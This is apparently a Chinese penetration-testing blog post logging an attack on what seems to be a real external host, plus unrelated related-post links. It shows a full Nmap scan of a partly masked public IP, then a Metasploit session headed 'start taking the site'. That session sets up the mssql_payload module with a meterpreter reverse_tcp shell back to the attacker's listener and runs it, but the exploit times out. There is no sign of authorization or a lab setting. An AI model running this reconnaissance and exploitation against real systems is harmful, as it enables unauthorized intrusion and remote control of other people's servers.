扫描一下

Starting Nmap 5.30BETA1 ( http://nmap.org ) at 2011-05-06 09:36 中国标准时间

NSE: Loaded 49 scripts for scanning.

Initiating Ping Scan at 09:36

Scanning 203.171.239.* [4 ports]

Completed Ping Scan at 09:36, 0.90s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host. at 09:36

Completed Parallel DNS resolution of 1 host. at 09:36, 0.03s elapsed

Initiating SYN Stealth Scan at 09:36

Scanning 203.171.239.* [1000 ports]

Discovered open port 3389/tcp on 203.171.239.*

Discovered open port 80/tcp on 203.171.239.*

Discovered open port 3306/tcp on 203.171.239.*

Discovered open port 21/tcp on 203.171.239.*

Completed SYN Stealth Scan at 09:36, 33.18s elapsed (1000 total ports)

Initiating Service scan at 09:36

Scanning 4 services on 203.171.239.*

Completed Service scan at 09:37, 6.07s elapsed (4 services on 1 host)

Initiating OS detection (try #1) against 203.171.239.*

Retrying OS detection (try #2) against 203.171.239.*

Initiating Traceroute at 09:37

Completed Traceroute at 09:37, 0.06s elapsed

Initiating Parallel DNS resolution of 1 host. at 09:37

Completed Parallel DNS resolution of 1 host. at 09:37, 0.03s elapsed

NSE: Script scanning 203.171.239.*.

NSE: Starting runlevel 1 (of 1) scan.

Initiating NSE at 09:37

Completed NSE at 09:37, 5.22s elapsed

NSE: Script Scanning completed.

Nmap scan report for 203.171.239.*

Host is up (0.043s latency).

Not shown: 994 filtered ports

PORT STATE SERVICE VERSION

21/tcp open ftp Microsoft ftpd

25/tcp closed smtp

80/tcp open http Microsoft IIS httpd

|_http-methods: No Allow or Public header in OPTIONS response (status code 400)

|_html-title: Site doesn't have a title (text/html).

110/tcp closed pop3

3306/tcp open mysql MySQL 5.1.32-community

| mysql-info: Protocol: 10

| Version: 5.1.32-community

| Thread ID: 30457

| Some Capabilities: Long Passwords, Connect with DB, Compress, ODBC, Transactions, Secure Connection

| Status: Autocommit

|_Salt: <*[k+0O~O" target=_blank>B@Y";By^J5k<*[k+0O~O

3389/tcp open microsoft-rdp Microsoft Terminal Service

Device type: general purpose|media device

Running (JUST GUESSING) : Microsoft Windows 2003|XP (93%), Motorola Windows PocketPC/CE (85%)

Aggressive OS guesses: Microsoft Windows Server 2003 SP1 or SP2 (93%), Microsoft Windows Server 2003 SP1 (92%), Microsoft Windows Server 2003 SP2 (91%), Microsoft Windows XP Professional SP3 (85%), Microsoft Windows XP SP2 (85%), Microsoft Windows XP SP3 (85%), Motorola VIP1216 digital set top box (Windows CE 5.0) (85%)

No exact OS matches for host (test conditions non-ideal).

Network Distance: 1 hop

TCP Sequence Prediction: Difficulty=262 (Good luck!)

IP ID Sequence Generation: Busy server or unknown class

Service Info: OS: Windows

TRACEROUTE (using port 25/tcp)

HOP RTT ADDRESS

1 50.00 ms 203.171.239.*

Read data files from: D:\metasploit\Nmap

OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 54.32 seconds

Raw packets sent: 2095 (95.768KB) | Rcvd: 251 (223.649KB)

开始拿站

Welcome to the Metasploit Web Console!

_ _

_ | | (_)_

____ ____| |_ ____ ___ ____ | | ___ _| |_

| \ / _ ) _)/ _ |/___) _ \| |/ _ \| | _)

| | | ( (/ /| |_( ( | |___ | | | | | |_| | | |__

|_|_|_|\____)\___)_||_(___/| ||_/|_|\___/|_|\___)

|_|

=[ metasploit v3.4.2-dev [core:3.4 api:1.0]

+ -- --=[ 566 exploits - 283 auxiliary

+ -- --=[ 210 payloads - 27 encoders - 8 nops

=[ svn r9834 updated 296 days ago (2010.07.14)

Warning: This copy of the Metasploit Framework was last updated 296 days ago.

We recommend that you update the framework at least every other day.

For information on updating your copy of Metasploit, please see:

http://www.metasploit.com/redmine/projects/framework/wiki/Updating

>> use windows/mssql/mssql_payload

>> info windows/mssql/mssql_payload

Name: Microsoft SQL Server Payload Execution

Version: 9669

Platform: Windows

Privileged: No

License: Metasploit Framework License (BSD)

Rank: Excellent

Provided by:

David Kennedy "ReL1K" <kennedyd013@gmail.com>

jduck <jduck@metasploit.com>

Available targets:

Id Name

-- ----

0 Automatic

Basic options:

Name Current Setting Required Description

---- --------------- -------- -----------

PASSWORD no The password for the specified username

RHOST yes The target address

RPORT 1433 yes The target port

USERNAME sa no The username to authenticate as

UseCmdStager true no Wait for user input before returning from exploit

VERBOSE false no Enable verbose output

Payload information:

Description:

This module will execute an arbitrary payload on a Microsoft SQL

Server, using the Windows debug.com method for writing an executable

to disk and the xp_cmdshell stored procedure. File size restrictions

are avoided by incorporating the debug bypass method presented at

Defcon 17 by SecureState. Note that this module will leave a

metasploit payload in the Windows System32 directory which must be

manually deleted once the attack is completed.

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-0402

http://www.osvdb.org/557

http://www.securityfocus.com/bid/1281

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2000-1209

http://www.osvdb.org/15757

http://www.securityfocus.com/bid/4797

http://www.thepentest.com/presentations/FastTrack_ShmooCon2009.pdf

>> use windows/mssql/mssql_payload

>> set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

>> show options

Module options:

Name Current Setting Required Description

---- --------------- -------- -----------

PASSWORD no The password for the specified username

RHOST yes The target address

RPORT 1433 yes The target port

USERNAME sa no The username to authenticate as

UseCmdStager true no Wait for user input before returning from exploit

VERBOSE false no Enable verbose output

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC process yes Exit technique: seh, thread, process

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic

>> set RHOST 203.171.239.*

RHOST => 203.171.239.*

>> set LHOST 172.16.2.101

LHOST => 172.16.2.101

>> exploit

[*] Started reverse handler on 172.16.2.101:4444

[-] Exploit failed: The connection timed out (203.171.239.*:1433).

[*] Exploit completed, but no session was created.

渗透杂记-2013-07-13 windows/mssql/mssql_payload的更多相关文章

  1. kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail 相关链接:https://www.bbsmax.com/A/xl569l20Jr/ http://4hou.win/wordp ...

  2. http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html

    http://www.cnblogs.com/younggun/archive/2013/07/16/3193800.html

  3. SharePoint 2013中修改windows 活动目录(AD)域用户密码的WebPart(免费下载)

    前段时间工作很忙,好久没更新博客了,趁国庆休假期间,整理了两个之前积累很实用的企业集成组件,并在真正的大型项目中经受住了考验:.Net版SAP RFC适配器组件和SharePoint 2013修改AD ...

  4. http://www.ruanyifeng.com/blog/2013/07/gpg.html

    http://www.ruanyifeng.com/blog/2013/07/gpg.html

  5. 多线程博文地址 http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html

    http://www.cnblogs.com/nokiaguy/archive/2008/07/13/1241817.html

  6. <2013 07 31> 没有必然的理由

    <2013 07 31> 没有必然的理由 没有必然的理由 人类从野蛮走向文明 也可能,从野蛮走向更野蛮 没有必然的理由 人群从疯狂走向理智 也可能,从疯狂走向更疯狂 没有必然的理由 你我从 ...

  7. 渗透杂记-2013-07-13 Windows XP SP2-SP3 / Windows Vista SP0 / IE 7

    Welcome to the Metasploit Web Console! | | _) | __ `__ \ _ \ __| _` | __| __ \ | _ \ | __| | | | __/ ...

  8. 小白日记17:kali渗透测试之缓冲区溢出实例-windows,POP3,SLmail

    缓冲区溢出实例 缓冲区溢出原理:http://www.cnblogs.com/fanzhidongyzby/archive/2013/08/10/3250405.html 空间存储了用户程序的函数栈帧 ...

  9. SAP ERP 6.0 EHP7 SR2(WINDOWS MSSQL版)安装说明

    原文 by 枫竹丹青 ⋅ 1.安装准备 1.1.版本说明 本文是描述在一个Windows虚拟机.SQL Server数据库环境下,安装SAP ERP 6.0 EHP7 SR2服务器,安装完成虚拟机文件 ...

随机推荐

  1. 升级win8.1后mysql服务不能启动的问题

    升级win8.1后发现服务列表中MySQL55不见了. 1. 先把服务恢复. mysql没有看到maitenance,找到安装文件 mysql-installer-community-5.6.12.0 ...

  2. JMeter学习-036-JMeter调试工具之三---Debug Sampler

    前面两篇文章分别讲述了 HTTP Mirror Server 和 Debug PostProcessor 的脚本调试实例.此文主要讲述第三种调试工具:DebugSampler,其主要是查看JMeter ...

  3. highcharts 插件问题

    Uncaught TypeError: $(...).highcharts is not a function 解决方法: $('#container').highcharts({ colors: [ ...

  4. Python之路----------生成器

    一.列表生成式 想想如何创建一个列表[0,1,2,3,4,5] l = [0,1,2,3,4,5] 如果上面的列表元素足够多的话,是不是会写很多代码?看看列表生成式怎么写 #列表生成式 l = [x ...

  5. 移动Web开发调研

    背景 在移动互联网浪潮下,移动设备普及,对配置需要考虑移动端设备可访问性.Web作为最贴近用户的配置手段,面向从PC端传统页面,向移动端页面的转型. 概念 PC Web: 面向传统PC电脑的浏览器开发 ...

  6. GPS部标监控平台的架构设计(七)-压力测试

    部标监控平台的压力测试是部标检测流程的最后一个检测环节,也是最难的,很多送检的企业平台都是卡壳在这一个环节.企业平台面临的问题如下: 1.对于压力测试的具体指标要求理解含糊,只知道是模拟一万辆车终端进 ...

  7. 前端安全配置之Content-Security-Policy(csp)

    什么是CSP CSP全称Content Security Policy ,可以直接翻译为内容安全策略,说白了,就是为了页面内容安全而制定的一系列防护策略. 通过CSP所约束的的规责指定可信的内容来源( ...

  8. OpenCV整体的模块架构

    之前啃了不少OpenCV的官方文档,发现如果了解了一些OpenCV整体的模块架构后,再重点学习自己感兴趣的部分的话,就会有一览众山小的感觉,于是,就决定写出这篇文章,作为启程OpenCV系列博文的第二 ...

  9. oracle 11g如何完全卸载

    方法/步骤   停用oracle服务:进入计算机管理,在服务中,找到oracle开头的所有服务,右击选择停止   在开始菜单中,找到Universal Installer,运行Oracle Unive ...

  10. Java以基础类库

    Java以基础类库JFC(Java Foundation Class)的形式为程序员提供编程接口API,类库中的类按照用途归属于不同的包中. (一)java.lang包 Java最常用的包都属于该包, ...